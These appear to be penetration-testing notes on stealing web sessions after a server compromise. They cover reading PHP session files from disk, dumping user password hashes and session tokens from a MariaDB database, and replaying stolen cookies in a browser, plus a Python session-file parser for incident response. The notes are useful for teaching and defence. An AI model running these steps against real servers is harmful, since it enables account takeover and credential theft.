Session identifiers and session data can be retrieved from a web server's disk or memory once the attacker has compromised the server. Although more impactful actions are possible at that point, this post-exploitation method still has value: a harvested session can be reused in later attacks.
WEB SERVER ACCESS
PHP
root@target:~$ locate php.ini
/etc/php/7.4/apache2/php.ini
/etc/php/7.4/cli/php.ini
...
root@target:~$ cat /etc/php/7.4/cli/php.ini | grep 'session.save_path'
;session.save_path = "N;/path"
;session.save_path = "N;MODE;/path"
;session.save_path = "/var/lib/php/sessions"
root@target:~$ cat /etc/php/7.4/apache2/php.ini | grep 'session.save_path'
;session.save_path = "N;/path"
;session.save_path = "N;MODE;/path"
;session.save_path = "/var/lib/php/sessions"
* the session.save_path lines above are commented out (';'), so the directory shown is the build's default; the effective value is what php -i reports for session.save_path
* note that a victim has to be authenticated (hold a live session) for the attacker to find their session identifier on disk
* the session files use the naming convention sess_<sessionID>
- the same PHP session identifier, when viewed in the browser, may look like...
Name: PHPSESSID Value: s6kitq8d3071rmvbfitpim9mm Domain: 192.. Path: /
- the same PHP session identifier, when viewed on the web server, may look like...
sess_s6kitq8d3071rmvbfitpim9mm
root@target:~$ ls /var/lib/php/sessions
sess_s6kitq8d3071rmvbfitpim9mm
root@target:~$ cat /var/lib/php/sessions/sess_s6kitq8d3071rmvbfitpim9mm
username|s:5:"admin";
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookie > {targetSite}
Name: PHPSESSID
Value: s6kitq8d3071rmvbfitpim9mm
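Added example, not part of the original notes: a Python decoder for the name|value record format that sess_<id> files use (the username|s:5:"admin"; record above is one such entry), plus a triage helper an incident responder can run over the session directory of a compromised host to see which live sessions carry a given value. SAMPLE_FILE and the sess_ filenames in the helper's input are constructed.

```python
# Decoder for PHP's default session-file format: a sess_<id> file holds "name|value"
# records, each value encoded by PHP's serialize(). SAMPLE_FILE is constructed.
SAMPLE_FILE = b'username|s:5:"admin";uid|i:2;prefs|a:2:{s:4:"dark";b:1;s:4:"lang";s:2:"en";}'

class PhpSessionParser:
    def __init__(self, data: bytes):
        self.data = data.rstrip(b'\n')
        self.pos = 0

    def _until(self, ch: bytes) -> bytes:
        end = self.data.index(ch, self.pos)  # ValueError if the file is truncated
        tok, self.pos = self.data[self.pos:end], end + 1
        return tok

    def _value(self):
        tag = self.data[self.pos:self.pos + 1]
        self.pos += 2                         # skip the tag and ':' (';' for N)
        if tag == b'N':
            return None
        if tag == b'i':
            return int(self._until(b';'))
        if tag == b'b':
            return self._until(b';') == b'1'
        if tag == b's':                       # s:<len>:"<bytes>";  (len counts bytes)
            length = int(self._until(b':'))
            start = self.pos + 1              # skip the opening quote
            self.pos = start + length + 2     # skip the closing quote and ';'
            return self.data[start:start + length].decode('utf-8', 'replace')
        if tag == b'a':                       # a:<n>:{key value key value ...}
            count = int(self._until(b':'))
            self.pos += 1                     # '{'
            items = {}
            for _ in range(count):
                key = self._value()
                items[key] = self._value()
            self.pos += 1                     # '}' (no ';' follows an array)
            return items
        raise ValueError(f'unsupported tag {tag!r} at offset {self.pos - 2}')

    def parse(self) -> dict:
        session = {}
        while self.pos < len(self.data):
            name = self._until(b'|').decode()
            session[name] = self._value()
        return session

def sessions_with(files: dict, key: str, value) -> list:
    # IR triage over {filename: raw bytes}: session ids whose data has key == value
    return sorted(name.removeprefix('sess_') for name, raw in files.items()
                  if PhpSessionParser(raw).parse().get(key) == value)
```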
JAVA
.NET
ASP.NET session state lives in one of three places, depending on the configured session mode:
- the application worker process (aspnet_wp.exe): InProc session mode
- StateServer (a Windows service on the IIS host or on a separate server): OutProc session mode
- an SQL Server database
DATABASE ACCESS
The same data can also be pulled through an SQL injection vulnerability instead of a shell on the database host.
root@target:~$
MariaDB [(none)]> show databases;
+----------+
| Database |
+----------+
| project  |
| ...      |
+----------+
MariaDB [(none)]> use project;
...
MariaDB [project]> show tables;
+-------------------+
| Tables_in_project |
+-------------------+
| sessions          |
| users             |
| ...               |
+-------------------+
MariaDB [project]> select * from users;
+----+----------+-----------------+----------------------------------+
| id | username | email           | password                         |
+----+----------+-----------------+----------------------------------+
|  1 | test     | test@gmail.com  | 098f6bcd4621d373cade4e832627b4f6 |
|  2 | admin    | admin@admin.pwn | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+-----------------+----------------------------------+
* these hashes will take time to crack
MariaDB [project]> select * from all_sessions;
+----+-------------------+-------------------------+
| id | name              | session                 |
+----+-------------------+-------------------------+
|  1 | John              | Johnsspecialh4x0rc00kie |
|  2 | Ben               | Benssup3rs3cretc00kie   |
|  3 | Developer (admin) | develop3rl33tsp00ks     |
+----+-------------------+-------------------------+
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookie > {targetSite}
Name: PHPSESSID
Value: develop3rl33tsp00ks